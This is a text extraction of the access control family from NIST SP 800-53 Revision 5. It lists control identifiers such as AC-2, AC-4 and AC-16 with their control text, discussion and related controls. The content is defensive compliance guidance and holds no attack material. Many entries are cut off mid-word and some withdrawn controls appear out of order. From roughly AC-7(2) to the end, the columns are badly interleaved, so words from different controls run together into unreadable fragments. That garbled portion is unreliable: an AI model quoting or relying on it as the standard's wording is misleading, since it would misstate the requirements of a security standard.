Sp800 53r5 Control Catalog
NIST SP 800-53, Revision 5, Security and Privacy Controls for Information Systems and Organizations

Control Identifier | Control (or Control Enhancement) Name | Control Text | Discussion | Related Controls

AC-1 Policy and Procedures
Control text: a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: 1. [Selection (one or more): Organization-level; Mission/business process-level; System-level] access
Discussion: Access control policy and procedures address the controls in the AC family that are implemented withi
Related controls: IA-1, PM-9, PM-24, PS-8, SI-12.

AC-2 Account Management
Control text: a. Define and document the types of accounts allowed and specifically prohibited for use within the system;
Discussion: Examples of system account types include individual, shared, group, system, guest, anonymous, emergency, developer, temporary, and service. Identification of authorized system users and the
Related controls: AC-3, AC-5, AC-6, AC-17, AC-18, AC-20, AC-24, AU-2, AU-12, CM-5, IA-2, IA-4, IA-5, IA-8, MA-3, MA-5, PE-2, PL-4, PS-2, PS-4, PS-5, PS-7, PT-2, PT-3, SC-7, SC-12, SC-13, SC-37.

AC-2(1) Account Management | Automated System Account Management
Control text: Support the management of system accounts using [Assignment: organization-defined automated mechanisms].
Discussion: Automated system account management includes using automated mechanisms to create, enable, modify, disable, and remove accounts; notify account managers when an account is created,
Related controls: None.

AC-2(2) Account Management | Automated Temporary and Emergency Account Management
Control text: Automatically [Selection: remove; disable] temporary and emergency accounts after [Assignment: organization-defined time period for each type of account].
Discussion: Management of temporary and emergency accounts includes the removal or disabling of such accounts automatically after a predefined time period rather than at the convenience of the system
Related controls: None.

AC-2(3) Account Management | Disable Accounts
Control text: Disable accounts within [Assignment: organization-defined time period] when the accounts: (a) Have expired;
Discussion: Disabling expired, inactive, or otherwise anomalous accounts supports the concepts of least privilege and least functionality which reduce the attack surface of the system.
Related controls: None.

AC-2(4) Account Management | Automated Audit Actions
Control text: Automatically audit account creation, modification, enabling, disabling, and removal actions.
Discussion: Account management audit records are defined in accordance with AU-2 and reviewed, analyzed, and
Related controls: AU-2, AU-6.

AC-2(5) Account Management | Inactivity Logout
Control text: Require that users log out when [Assignment: organization-defined time period of expected inactivity
Discussion: Inactivity logout is behavior- or policy-based and requires users to take physical action to log out w
Related controls: AC-11.
AC-2(6) Account Management | Dynamic Privilege Management
Control text: Implement [Assignment: organization-defined dynamic privilege management capabilities].
Discussion: In contrast to access control approaches that employ static accounts and predefined user privileges,
Related controls: AC-16.
AC-2(7) Account Management | Privileged User Accounts
Control text: (a) Establish and administer privileged user accounts in accordance with [Selection: a role-based access scheme; an attribute-based access scheme];
Discussion: Privileged roles are organization-defined roles assigned to individuals that allow those individuals to perform certain security-relevant functions that ordinary users are not authorized to perform.
Related controls: None.

AC-2(8) Account Management | Dynamic Account Management
Control text: Create, activate, manage, and deactivate [Assignment: organization-defined system accounts] dynami
Discussion: Approaches for dynamically creating, activating, managing, and deactivating system accounts rely on
Related controls: AC-16.

AC-2(9) Account Management | Restrictions on Use of Shared and Group Accounts
Control text: Only permit the use of shared and group accounts that meet [Assignment: organization-defined conditions for establishing shared and group accounts].
Discussion: Before permitting the use of shared or group accounts, organizations consider the increased risk due to the lack of accountability with such accounts.
Related controls: None.

AC-13 Supervision and Review — Access Control
[Withdrawn: Incorporated into AC-2 and AU-6.]
AC-2(11) Account Management | Usage Conditions
Control text: Enforce [Assignment: organization-defined circumstances and/or usage conditions] for [Assignment: organization-defined system accounts].
Discussion: Specifying and enforcing usage conditions helps to enforce the principle of least privilege, increase user accountability, and enable effective account monitoring. Account monitoring includes alerts
Related controls: None.

AC-2(12) Account Management | Account Monitoring for Atypical Usage
Control text: (a) Monitor system accounts for [Assignment: organization-defined atypical usage]; and (b) Report atypical usage of system accounts to [Assignment: organization-defined personnel or
Discussion: Atypical usage includes accessing systems at certain times of the day or from locations that are not
Related controls: AU-6, AU-7, CA-7, IR-8, SI-4.

AC-2(13) Account Management | Disable Accounts for High-risk Individuals
Control text: Disable accounts of individuals within [Assignment: organization-defined time period] of discovery
Discussion: Users who pose a significant security and/or privacy risk include individuals for whom reliable evide
Related controls: AU-6, SI-4.
AC-3 Access Enforcement
Control text: Enforce approved authorizations for logical access to information and system resources in accordance
Discussion: Access control policies control access between active entities or subjects (i.e., users or processes a
Related controls: AC-2, AC-4, AC-5, AC-6, AC-16, AC-17, AC-18, AC-19, AC-20, AC-21, AC-22, AC-24, AC-25, AT-2, AT-3, AU-9, CA-9, CM-5, CM-11, IA-2, IA-5, IA-6, IA-7, IA-11, MA-3, MA-4, MA-5,

AC-14(1) Permitted Actions Without Identification or Authentication | Necessary Uses
[Withdrawn: Incorporated into AC-14.]

AC-3(2) Access Enforcement | Dual Authorization
Control text: Enforce dual authorization for [Assignment: organization-defined privileged commands and/or other
Discussion: Dual authorization, also known as two-person control, reduces risk related to insider threats. Dual
Related controls: CP-9, MP-6.
AC-3(3) Access Enforcement | Mandatory Access Control
Control text: Enforce [Assignment: organization-defined mandatory access control policy] over the set of covered subjects and objects specified in the policy, and where the policy:
Discussion: Mandatory access control is a type of nondiscretionary access control. Mandatory access control policies constrain what actions subjects can take with information obtained from objects for which they have already been granted access. This prevents the subjects from passing the information to unauthorized subjects and objects. Mandatory access control policies constrain actions that
Related controls: SC-7.

AC-3(4) Access Enforcement | Discretionary Access Control
Control text: Enforce [Assignment: organization-defined discretionary access control policy] over the set of covered subjects and objects specified in the policy, and where the policy specifies that a subject that has been granted access to information can do one or more of the following:
Discussion: When discretionary access control policies are implemented, subjects are not constrained with regard to what actions they can take with information for which they have already been granted access. Thus, subjects that have been granted access to information are not prevented from passing the information to other subjects or objects (i.e., subjects have the discretion to pass). Discretionary
Related controls: None.

AC-3(5) Access Enforcement | Security-relevant Information
Control text: Prevent access to [Assignment: organization-defined security-relevant information] except during se
Discussion: Security-relevant information is information within systems that can potentially impact the operation
Related controls: CM-6, SC-39.

AC-15 Automated Marking
[Withdrawn: Incorporated into MP-3.]
AC-3(7) Access Enforcement | Role-based Access Control
Control text: Enforce a role-based access control policy over defined subjects and objects and control access based upon [Assignment: organization-defined roles and users authorized to assume such roles].
Discussion: Role-based access control (RBAC) is an access control policy that enforces access to objects and system functions based on the defined role (i.e., job function) of the subject. Organizations can create specific roles based on job functions and the authorizations (i.e., privileges) to perform needed operations on the systems associated with the organizational roles. When users are
Related controls: None.

AC-3(8) Access Enforcement | Revocation of Access Authorizations
Control text: Enforce the revocation of access authorizations resulting from changes to the security attributes of subjects and objects based on [Assignment: organization-defined rules governing the timing of revocations of access authorizations].
Discussion: Revocation of access rules may differ based on the types of access revoked. For example, if a subject (i.e., user or process acting on behalf of a user) is removed from a group, access may not be revoked until the next time the object is opened or the next time the subject attempts to access the object. Revocation based on changes to security labels may take effect immediately. Organizations
Related controls: None.

AC-3(9) Access Enforcement | Controlled Release
Control text: Release information outside of the system only if: (a) The receiving [Assignment: organization-defined system or system component] provides [Assignment: organization-defined controls]; and
Discussion: Organizations can only directly protect information when it resides within the system. Additional controls may be needed to ensure that organizational information is adequately protected once it is transmitted outside of the system. In situations where the system is unable to determine the adequacy of the protections provided by external entities, as a mitigation measure, organizations
Related controls: CA-3, PT-7, PT-8, SA-9, SC-16.

AC-3(10) Access Enforcement | Audited Override of Access Control Mechanisms
Control text: Employ an audited override of automated access control mechanisms under [Assignment: organization
Discussion: In certain situations, such as when there is a threat to human life or an event that threatens the org
Related controls: AU-2, AU-6, AU-10, AU-12, AU-14.

AC-3(11) Access Enforcement | Restrict Access to Specific Information Types
Control text: Restrict access to data repositories containing [Assignment: organization-defined information types].
Discussion: Restricting access to specific information is intended to provide flexibility regarding access control
Related controls: CM-8, CM-12, CM-13, PM-5.
AC-3(12) Access Enforcement | Assert and Enforce Application Access
Control text: (a) Require applications to assert, as part of the installation process, the access needed to the following system applications and functions: [Assignment: organization-defined system applications and functions];
Discussion: Asserting and enforcing application access is intended to address applications that need to access ex
Related controls: CM-7.

AC-3(13) Access Enforcement | Attribute-based Access Control
Control text: Enforce attribute-based access control policy over defined subjects and objects and control access based upon [Assignment: organization-defined attributes to assume access permissions].
Discussion: Attribute-based access control is an access control policy that restricts system access to authorized users based on specified organizational attributes (e.g., job function, identity), action attributes (e.g., read, write, delete), environmental attributes (e.g., time of day, location), and resource attributes (e.g., classification of a document). Organizations can create rules based on attributes
Related controls: None.

AC-3(14) Access Enforcement | Individual Access
Control text: Provide [Assignment: organization-defined mechanisms] to enable individuals to have access to the fo
Discussion: Individual access affords individuals the ability to review personally identifiable information about
Related controls: IA-8, PM-22, PM-20, PM-21, PT-6.

AC-3(15) Access Enforcement | Discretionary and Mandatory Access Control
Control text: (a) Enforce [Assignment: organization-defined mandatory access control policy] over the set of covered subjects and objects specified in the policy; and
Discussion: Simultaneously implementing a mandatory access control policy and a discretionary access control po
Related controls: SC-2, SC-3, AC-4.

AC-4 Information Flow Enforcement
Control text: Enforce approved authorizations for controlling the flow of information within the system and betwe
Discussion: Information flow control regulates where information can travel within a system and between systems (in contrast to who is allowed to access the information) and without regard to subsequent accesses to that information. Flow control restrictions include blocking external traffic that claims to be from within the organization, keeping export-controlled information from being transmitted in
Related controls: AC-3, AC-6, AC-16, AC-17, AC-19, AC-21, AU-10, CA-3, CA-9, CM-7, PL-9, PM-24, SA-17, SC-4, SC-7, SC-16, SC-31.

AC-4(1) Information Flow Enforcement | Object Security and Privacy Attributes
Control text: Use [Assignment: organization-defined security and privacy attributes] associated with [Assignment: organization-defined information, source, and destination objects] to enforce [Assignment: organization-defined information flow control policies] as a basis for flow control decisions.
Discussion: Information flow enforcement mechanisms compare security and privacy attributes associated with information (i.e., data content and data structure) and source and destination objects and respond appropriately when the enforcement mechanisms encounter information flows not explicitly allowed by information flow policies. For example, an information object labeled Secret would be i
Related controls: None.

AC-4(2) Information Flow Enforcement | Processing Domains
Control text: Use protected processing domains to enforce [Assignment: organization-defined information flow control policies] as a basis for flow control decisions.
Discussion: Protected processing domains within systems are processing spaces that have controlled interaction
Related controls: SC-39.

AC-4(3) Information Flow Enforcement | Dynamic Information Flow Control
Control text: Enforce [Assignment: organization-defined information flow control policies].
Discussion: Organizational policies regarding dynamic information flow control include allowing or disallowing
Related controls: SI-4.

AC-4(4) Information Flow Enforcement | Flow Control of Encrypted Information
Control text: Prevent encrypted information from bypassing [Assignment: organization-defined information flow co
Discussion: Flow control mechanisms include content checking, security policy filters, and data type identifiers.
Related controls: SI-4.

AC-4(5) Information Flow Enforcement | Embedded Data Types
Control text: Enforce [Assignment: organization-defined limitations] on embedding data types within other data types.
Discussion: Embedding data types within other data types may result in reduced flow control effectiveness. Data type embedding includes inserting files as objects within other files and using compressed or archived data types that may include multiple embedded data types. Limitations on data type embedding consider the levels of embedding and prohibit levels of data type embedding that are
Related controls: None.

AC-4(6) Information Flow Enforcement | Metadata
Control text: Enforce information flow control based on [Assignment: organization-defined metadata].
Discussion: Metadata is information that describes the characteristics of data. Metadata can include structural
Related controls: AC-16, SI-7.

AC-4(7) Information Flow Enforcement | One-way Flow Mechanisms
Control text: Enforce one-way information flows through hardware-based flow control mechanisms.
Discussion: One-way flow mechanisms may also be referred to as a unidirectional network, unidirectional security gateway, or data diode. One-way flow mechanisms can be used to prevent data from being exported from a higher impact or classified domain or system while permitting data from a lower impact or unclassified domain or system to be imported.
Related controls: None.

AC-4(8) Information Flow Enforcement | Security and Privacy Policy Filters
Control text: (a) Enforce information flow control using [Assignment: organization-defined security or privacy policy filters] as a basis for flow control decisions for [Assignment: organization-defined information flows]; and
Discussion: Organization-defined security or privacy policy filters can address data structures and content. For example, security or privacy policy filters for data structures can check for maximum file lengths, maximum field sizes, and data/file types (for structured and unstructured data). Security or privacy policy filters for data content can check for specific words, enumerated values or data value ranges, and
Related controls: None.

AC-4(9) Information Flow Enforcement | Human Reviews
Control text: Enforce the use of human reviews for [Assignment: organization-defined information flows] under the following conditions: [Assignment: organization-defined conditions].
Discussion: Organizations define security or privacy policy filters for all situations where automated flow control decisions are possible. When a fully automated flow control decision is not possible, then a human review may be employed in lieu of or as a complement to automated security or privacy policy filtering. Human reviews may also be employed as deemed necessary by organizations.
Related controls: None.

AC-4(10) Information Flow Enforcement | Enable and Disable Security or Privacy Policy Filters
Control text: Provide the capability for privileged administrators to enable and disable [Assignment: organization-defined security or privacy policy filters] under the following conditions: [Assignment: organization-defined conditions].
Discussion: For example, as allowed by the system authorization, administrators can enable security or privacy policy filters to accommodate approved data types. Administrators also have the capability to select between different security or privacy policy filters that are executed on a specific data flow based on the type of data that is being transferred, the source and destination security domains, and other security or privacy relevant
Related controls: None.

AC-4(11) Information Flow Enforcement | Configuration of Security or Privacy Policy Filters
Control text: Provide the capability for privileged administrators to configure [Assignment: organization-defined security or privacy policy filters] to support different security or privacy policies.
Discussion: Documentation contains detailed information for configuring security or privacy policy filters. For example, administrators can configure security or privacy policy filters to include the list of inappropriate words that security or privacy policy mechanisms check in accordance with the definitions provided by organizations.
Related controls: None.

AC-4(12) Information Flow Enforcement | Data Type Identifiers
Control text: When transferring information between different security domains, use [Assignment: organization-defined data type identifiers] to validate data essential for information flow decisions.
Discussion: Data type identifiers include filenames, file types, file signatures or tokens, and multiple internal file signatures or tokens. Systems only transfer data that is compliant with data type format specifications. Identification and validation of data types is based on defined specifications associated with each allowed data format. The filename and number alone are not used for data
Related controls: None.

AC-4(13) Information Flow Enforcement | Decomposition into Policy-relevant Subcomponents
Control text: When transferring information between different security domains, decompose information into [Assignment: organization-defined policy-relevant subcomponents] for submission to policy enforcement mechanisms.
Discussion: Decomposing information into policy-relevant subcomponents prior to information transfer facilitates policy decisions on source, destination, certificates, classification, attachments, and other security- or privacy-related component differentiators. Policy enforcement mechanisms apply filtering, inspection, and/or sanitization rules to the policy-relevant subcomponents of the information
Related controls: None.

AC-4(14) Information Flow Enforcement | Security or Privacy Policy Filter Constraints
Control text: When transferring information between different security domains, implement [Assignment: organization-defined security or privacy policy filters] requiring fully enumerated formats that restrict data structure and content.
Discussion: Data structure and content restrictions reduce the range of potential malicious or unsanctioned content in cross-domain transactions. Security or privacy policy filters that restrict data structures include restricting file sizes and field lengths. Data content policy filters include encoding formats for character sets, restricting character data fields to only contain alpha-numeric characters,
Related controls: None.

AC-4(15) Information Flow Enforcement | Detection of Unsanctioned Information
Control text: When transferring information between different security domains, the information
Discussion: Unsanctioned information includes malicious code, information that is inappropriate for release from
Related controls: SI-3.

AC-17(5) Remote Access | Monitoring for Unauthorized Connections
[Withdrawn: Incorporated into SI-4.]
AC-4(17) Information Flow Enforcement | Domain Authentication
Control text: Uniquely identify and authenticate source and destination points by [Selection (one or more): organiza
Discussion: Attribution is a critical component of a security and privacy concept of operations. The ability to ide
Related controls: IA-2, IA-3, IA-9.

AC-17(7) Remote Access | Additional Protection for Security Function Access
[Withdrawn: Incorporated into AC-3(10).]
AC-4(19) Information Flow Enforcement | Validation of Metadata
Control text: When transferring information between different security domains, implement [Assignment: organization-defined security or privacy policy filters] on metadata.
Discussion: All information (including metadata and the data to which the metadata applies) is subject to filtering and inspection. Some organizations distinguish between metadata and data payloads (i.e., only the data to which the metadata is bound). Other organizations do not make such distinctions and consider metadata and the data to which the metadata applies to be part of the payload.
Related controls: None.

AC-4(20) Information Flow Enforcement | Approved Solutions
Control text: Employ [Assignment: organization-defined solutions in approved configurations] to control the flow of [Assignment: organization-defined information] across security domains.
Discussion: Organizations define approved solutions and configurations in cross-domain policies and guidance in accordance with the types of information flows across classification boundaries. The National Security Agency (NSA) National Cross Domain Strategy and Management Office provides a listing of approved cross-domain solutions. Contact [email protected] for more information.
Related controls: None.

AC-4(21) Information Flow Enforcement | Physical or Logical Separation of Information Flows
Control text: Separate information flows logically or physically using [Assignment: organization-defined mechanis
Discussion: Enforcing the separation of information flows associated with defined types of data can enhance prot
Related controls: SC-32.
AC-4(22) Information Flow Enforcement | Access Only
Control text: Provide access from a single device to computing platforms, applications, or data residing in multiple different security domains, while preventing information flow between the different security domains.
Discussion: The system provides a capability for users to access each connected security domain without providing any mechanisms to allow users to transfer data or information between the different security domains. An example of an access-only solution is a terminal that provides a user access to information with different security classifications while assuredly keeping the information separate.
Related controls: None.

AC-4(23) Information Flow Enforcement | Modify Non-releasable Information
Control text: When transferring information between different security domains, modify the non-releasable information by implementing [Assignment: organization-defined modification action].
Discussion: Modifying non-releasable information can help prevent a data spill or attack when information is transferred across security domains. Modification actions include masking, permutation, alteration, removal, or redaction.
Related controls: None.

AC-4(24) Information Flow Enforcement | Internal Normalized Format
Control text: When transferring information between different security domains, parse incoming data into an internal normalized format and regenerate the data to be consistent with its intended specification.
Discussion: Converting data into normalized forms is one of most effective mechanisms to stop malicious attacks and large classes of data exfiltration.
Related controls: None.

AC-4(25) Information Flow Enforcement | Data Sanitization
Control text: When transferring information between different security domains, sanitize data to minimize [Select
Discussion: Data sanitization is the process of irreversibly removing or destroying data stored on a memory device
Related controls: MP-6.
AC-4(26) Information Flow Enforcement | Audit Filtering Actions
Control text: When transferring information between different security domains, record and audit content filtering
Discussion: Content filtering is the process of inspecting information as it traverses a cross-domain solution and
Related controls: AU-2, AU-3, AU-12.
AC-4(27) Information Flow Enforcement | Redundant/independent Filtering Mechanisms
Control text: When transferring information between different security domains, implement content filtering solutions that provide redundant and independent filtering mechanisms for each data type.
Discussion: Content filtering is the process of inspecting information as it traverses a cross-domain solution and determines if the information meets a predefined policy. Redundant and independent content filtering eliminates a single point of failure filtering system. Independence is defined as the implementation of a content filter that uses a different code base and supporting libraries (e.g., two
Related controls: None.

AC-4(28) Information Flow Enforcement | Linear Filter Pipelines
Control text: When transferring information between different security domains, implement a linear content filter pipeline that is enforced with discretionary and mandatory access controls.
Discussion: Content filtering is the process of inspecting information as it traverses a cross-domain solution and determines if the information meets a predefined policy. The use of linear content filter pipelines ensures that filter processes are non-bypassable and always invoked. In general, the use of parallel
Related controls: None.

AC-4(29) Information Flow Enforcement | Filter Orchestration Engines
Control text: When transferring information between different security domains, employ content filter orchestration engines to ensure that:
Discussion: Content filtering is the process of inspecting information as it traverses a cross-domain solution and determines if the information meets a predefined security policy. An orchestration engine coordinates the sequencing of activities (manual and automated) in a content filtering process. Errors are defined as either anomalous actions or unexpected termination of the content filter
Related controls: None.

AC-4(30) Information Flow Enforcement | Filter Mechanisms Using Multiple Processes
Control text: When transferring information between different security domains, implement content filtering mechanisms using multiple processes.
Discussion: The use of multiple processes to implement content filtering mechanisms reduces the likelihood of a single point of failure.
Related controls: None.

AC-4(31) Information Flow Enforcement | Failed Content Transfer Prevention
Control text: When transferring information between different security domains, prevent the transfer of failed content to the receiving domain.
Discussion: Content that failed filtering checks can corrupt the system if transferred to the receiving domain.
Related controls: None.

AC-4(32) Information Flow Enforcement | Process Requirements for Information Transfer
Control text: When transferring information between different security domains, the process that transfers information between filter pipelines:
Discussion: The processes transferring information between filter pipelines have minimum complexity and functionality to provide assurance that the processes operate correctly.
Related controls: None.
AC-5 Separation of Duties
Control text: a. Identify and document [Assignment: organization-defined duties of individuals requiring separation]; and
Discussion: Separation of duties addresses the potential for abuse of authorized privileges and helps to reduce t
Related controls: AC-2, AC-3, AC-6, AU-9, CM-5, CM-11, CP-9, IA-2, IA-4, IA-5, IA-12, MA-3, MA-5, PS-2, SA-8, SA-17.

AC-6 Least Privilege
Control text: Employ the principle of least privilege, allowing only authorized accesses for users (or processes acti
Discussion: Organizations employ least privilege for specific duties and systems. The principle of least privilege
Related controls: AC-2, AC-3, AC-5, AC-16, CM-5, CM-11, PL-2, PM-12, SA-8, SA-15, SA-17, SC-38.
AC-6(1) Least Privilege | Authorize Access to Security Functions
Control text: Authorize access for [Assignment: organization-defined individuals or roles] to: (a) [Assignment: organization-defined security functions (deployed in hardware, software, and firmware)]; and
Discussion: Security functions include establishing system accounts, configuring access authorizations (i.e., perm
Related controls: AC-17, AC-18, AC-19, AU-9, PE-2.
AC-6(2) Least Privilege | Non-privileged Access for Nonsecurity Functions
Control text: Require that users of system accounts (or roles) with access to [Assignment: organization-defined sec
Discussion: Requiring the use of non-privileged accounts when accessing nonsecurity functions limits exposure wh
Related controls: AC-17, AC-18, AC-19, PL-4.
AC-6(3) Least Privilege | Network Access to Privileged Commands
Control text: Authorize network access to [Assignment: organization-defined privileged commands] only for [Assign
Discussion: Network access is any access across a network connection in lieu of local access (i.e., user being physi
Related controls: AC-17, AC-18, AC-19.

AC-6(4) Least Privilege | Separate Processing Domains
Control text: Provide separate processing domains to enable finer-grained allocation of user privileges.
Discussion: Providing separate processing domains for finer-grained allocation of user privileges includes using
Related controls: AC-4, SC-2, SC-3, SC-30, SC-32, SC-39.

AC-6(5) Least Privilege | Privileged Accounts
Control text: Restrict privileged accounts on the system to [Assignment: organization-defined personnel or roles].
Discussion: Privileged accounts, including super user accounts, are typically described as system administrator fo
Related controls: IA-2, MA-3, MA-4.

AC-6(6) Least Privilege | Privileged Access by Non-organizational Users
Control text: Prohibit privileged access to the system by non-organizational users.
Discussion: An organizational user is an employee or an individual considered by the organization to have the equi
Related controls: AC-18, AC-19, IA-2, IA-8.
AC-6(7) Least Privilege | Review of User Privileges
Control text: (a) Review [Assignment: organization-defined frequency] the privileges assigned to [Assignment: organization-defined roles or classes of users] to validate the need for such privileges; and
Discussion: The need for certain assigned user privileges may change over time to reflect changes in organizationa
Related controls: CA-7.

AC-6(8) Least Privilege | Privilege Levels for Code Execution
Control text: Prevent the following software from executing at higher privilege levels than users executing the software: [Assignment: organization-defined software].
Discussion: In certain situations, software applications or programs need to execute with elevated privileges to perform required functions. However, depending on the software functionality and configuration, if the privileges required for execution are at a higher level than the privileges assigned to organizational users invoking such applications or programs, those users may indirectly be provided
Related controls: None.

AC-6(9) Least Privilege | Log Use of Privileged Functions
Control text: Log the execution of privileged functions.
Discussion: The misuse of privileged functions, either intentionally or unintentionally by authorized users or by
Related controls: AU-2, AU-3, AU-12.

AC-6(10) Least Privilege | Prohibit Non-privileged Users from Executing Privileged Functions
Control text: Prevent non-privileged users from executing privileged functions.
Discussion: Privileged functions include disabling, circumventing, or altering implemented security or privacy controls, establishing system accounts, performing system integrity checks, and administering cryptographic key management activities. Non-privileged users are individuals who do not possess appropriate authorizations. Privileged functions that require protection from non-privileged users
Related controls: None.

AC-7 Unsuccessful Logon Attempts
Control text: a. Enforce a limit of [Assignment: organization-defined number] consecutive invalid logon attempts by a user during a [Assignment: organization-defined time period]; and
Discussion: The need to limit unsuccessful logon attempts and take subsequent action when the maximum number
Related controls: AC-2, AC-9, AU-2, AU-6, IA-5.

AC-17(8) Remote Access | Disable Nonsecure Network Protocols
[Withdrawn: Incorporated into CM-7.]
AC-7(2) Unsuccessful Logon Attempts | Purge or Wipe Mobile Device Purge or wipe information from [Assignment: organization-defined mobile devices] based on [Assign A mobile device is a computing device that has a small form factor such that it can be carried by a s AC-19, MP-5, MP-6.
AC-7(3) Unsuccessful Logon Attempts | Biometric Attempt Limiting Limit the number of unsuccessful biometric logon attempts to [Assignment: organization-defined nu Biometrics are probabilistic in nature. The ability to successfully authenticate can be impacted by many IA-3.factors, including matching performance and presentation attack detection mechanisms. Organization
AC-7(4) Unsuccessful Logon Attempts | Use of Alternate Authentication Factor (a) Allow the use of [Assignment: organization-defined authentication factors] that are different The use of alternate authentication factors supports the objective of availability and allows a user w IA-3.
AC-8 System Use Notification from the primary authentication factors after the number of organization-defined consecutive
a. Display [Assignment: organization-defined system use notification message or banner] to users System use notifications can be implemented using messages or warning banners displayed before indiv AC-14, PL-4, SI-4.
invalid
before logon
granting attempts have
to thebeen
accesssuccessful system exceeded; and privacy and security notices consistent with
AC-9 Previous Logon Notification Notify the user, upon logonthat provides
to the system, of the date and time of the last logon. Previous logon notification is applicable to system access via human user interfaces and access to systAC-7, PL-4.
applicable laws, executive orders, directives, regulations, policies, standards, and guidelines and
AC-9(1) Previous Logon Notification | Unsuccessful Logons Notifythat:
state the user, upon successful logon, of the number of unsuccessful logon attempts since the last Information about the number of unsuccessful logon attempts since the last successful logon allows None.
AC-9(2) Previous Logon Notification | Successful and Unsuccessful Logons successful
Notify logon.upon successful logon, of the number of [Selection: successful logons; unsuccessful Information
the user, the user to recognize
about theifnumber the number of unsuccessful
of successful logon attempts
and unsuccessful logonisattempts
consistent withathe
within user’s
specified None.
logon attempts; both]successful
during [Assignment: organization-defined time period]. actual logonallows
time period attempts. the user to to security-related
recognize if the number
AC-9(3) Previous Logon Notification | Notification of Account Changes Notify the user, upon logon, of changes to [Assignment: organization-defined security- Information about changes account and type of logon
characteristics attempts
within are consistent
a specified time period None.
related characteristics or parameters of the user’s account] during [Assignment: organization- with the
allows user’s
users to actual
recognize logon if attempts.
changes were made without their knowledge.
AC-9(4) Previous Logon Notification | Additional Logon Information Notify the user, upon successful logon, of the following additional information: [Assignment: Organizations can specify additional information to be provided to users upon logon, including the None.
defined time period]. additional information].
organization-defined location of the last logon. User location is defined as information that can be determined by
systems, such as Internet Protocol (IP) addresses from which network logons occurred, notifications
of local logons, or device identifiers.

AC-10 Concurrent Session Control Limit the number of concurrent sessions for each [Assignment: organization-defined account and/or Organizations may define the maximum number of concurrent sessions for system accounts globally,SC-23. by
AC-11 Device Lock a. Prevent further access to the system by [Selection (one or more): initiating a device lock after Device locks are temporary actions taken to prevent logical access to organizational systems when user AC-2, AC-7, IA-11, PL-4.
AC-11(1) Device Lock | Pattern-hiding Displays [Assignment:
Conceal, via theorganization-defined
device lock, information time period]
previouslyof inactivity;
visible onrequiring
the display thewith
userato initiateviewable
publicly a device The pattern-hiding display can include static or dynamic images, such as patterns used with screen None.
lock before leaving the system unattended]; and
image.
AC-12 Session Termination Automatically terminate a user session after [Assignment: organization-defined conditions or trigger savers, Sessionphotographic
termination addresses images, solid colors, clock,ofbattery
the termination life indicator,
user-initiated logicalor a blank(in
sessions screen
contrastwithto theSC-10 MA-4, SC-10, SC-23.
caveat that controlled unclassified information is not displayed.
AC-12(1) Session Termination | User-initiated Logouts Provide a logout capability for user-initiated communications sessions whenever authentication is Information resources to which users gain access via authentication include local workstations, None.
AC-12(2) Session Termination | Termination Message used to an
Display gain accesslogout
explicit to [Assignment:
message toorganization-defined information of
users indicating the termination resources].
authenticated databases,
Logout and password-protected
messages for web access canwebsites be displayed or web-based services. sessions have been
after authenticated None.
AC-12(3) Session Termination | Timeout Warning Message communications sessions.
Display an explicit message to users indicating that the session will end in [Assignment: terminated. However, for certain types of sessions, including file
To increase usability, notify users of pending session termination and prompt users to continue the None. transfer protocol (FTP) sessions,
organization-defined time until end of session]. systems typically
session. The pendingsendsession
logouttermination
messages astime finalperiod
messages prioron
is based to the
terminating
parameters sessions.
defined in the AC-
AC-18(2) Wireless Access | Monitoring Unauthorized Connections [Withdrawn: Incorporated into SI-4.]
12 base control.
AC-14 Permitted Actions Without Identification or Authentication a. Identify [Assignment: organization-defined user actions] that can be performed on the system Specific user actions may be permitted without identification or authentication if organizations dete AC-8, IA-2, PL-2.
AC-19(1) Access Control for Mobile Devices | Use of Writable and Portable Storage Devices without
[Withdrawn:identification
Incorporated or authentication
into MP-7.] consistent with organizational mission and business
functions; and
AC-19(2) Access Control for Mobile Devices | Use of Personally Owned Portable Storage Devices [Withdrawn: Incorporated into MP-7.]
AC-16 Security and Privacy Attributes a. Provide the means to associate [Assignment: organization-defined types of security and privacy Information is represented internally within systems using abstractions known as data structures. AC-3, AC-4, AC-6, AC-21, AC-25, AU-2, AU-10, MP-3, PE-22, PT-2, PT-3, PT-4, SC-11, SC-16,
AC-16(1) Security and Privacy Attributes | Dynamic Attribute Association attributes] with
Dynamically [Assignment:
associate securityorganization-defined
and privacy attributes security and privacy attribute
with [Assignment: values] for
organization-defined Internal data
Dynamic structures
association can represent
of attributes different types
is appropriate whenever of entities, both active
the security and passive.
or privacy Active of SI-12,
characteristics None. SI-18.
information
subjects andinobjects]
storage, inin process, and/or
accordance with thein transmission;
following security entities, alsochange
known over as subjects, are typically associated with individuals, devices, or processes
AC-16(2) Security and Privacy Attributes | Attribute Value Changes by Authorized Individuals Provide authorized individuals (or processes acting on behalf ofand privacy policies
individuals) as information
the capability to defineis information
The content
acting on behalfor assigned time. Attributes
values of attributes may canchange
directly due to information
affect the ability aggregation
areoftypically
individuals issues
to access(i.e., None.
created
or changeand combined:
the value of [Assignment:
associated organization-defined
security and privacy security and privacy policies].
attributes. characteristics
organizational ofofindividual
individuals.
information. data Passive
Therefore,elements entities,
it is are also
different
important
known
for from asthe
systems
objects,
combined
to be able elements),
to limit
associated
the changes
ability
with
toin
AC-16(3) Security and Privacy Attributes | Maintenance of Attribute Associations by System Maintain the association and integrity of [Assignment: organization-defined security and privacy Maintaining
individual the association
access authorizations and (i.e.,
integrity of security
privileges), changes and privacy attributes
in the security to subjects
category and objectsor None.
of information,
attributes] create or modify attributes to authorized individuals.
AC-16(4) Security and Privacy Attributes | Association of Attributes by Authorized Individuals Provide thetocapability
[Assignment: organization-defined
to associate subjects and objects].security and privacy
[Assignment: organization-defined with sufficient
Systems, assurance
in general, provide helpsthetocapability
ensure that for the attribute
privileged associations
users can be used
to assign security and as the basis of None.
privacy
attributes] with [Assignment: organization-defined subjectsform
andon objects] by authorized automatedtopolicy actions. Thesubjects integrity of specific items, such (e.g.,
as security configuration andfiles, may be
AC-16(5) Security and Privacy Attributes | Attribute Displays on Objects to Be Output Display security and privacy attributes in human-readable each object that the individuals
system attributes
System outputs
maintained
system-defined
throughinclude printed
theadditional
use of an pages, (e.g.,
integrity screens,users)or and
monitoring
objects
equivalent
mechanism items.that directories,
System output
detects
files,devices
anomalies
ports).
include None.
and
(or processes
transmits acting devices
to output on behalf to of individuals).
identify [Assignment: organization-defined special dissemination, Some systems
printers, notebook provide computers, capability
video displays, forsmart
general users to
phones, assign security and privacy
AC-16(6) Security and Privacy Attributes | Maintenance of Attribute Association Require personnel to associate and maintain the association of [Assignment: organization-defined Maintaining
attributes to attribute
additional association
objects requires
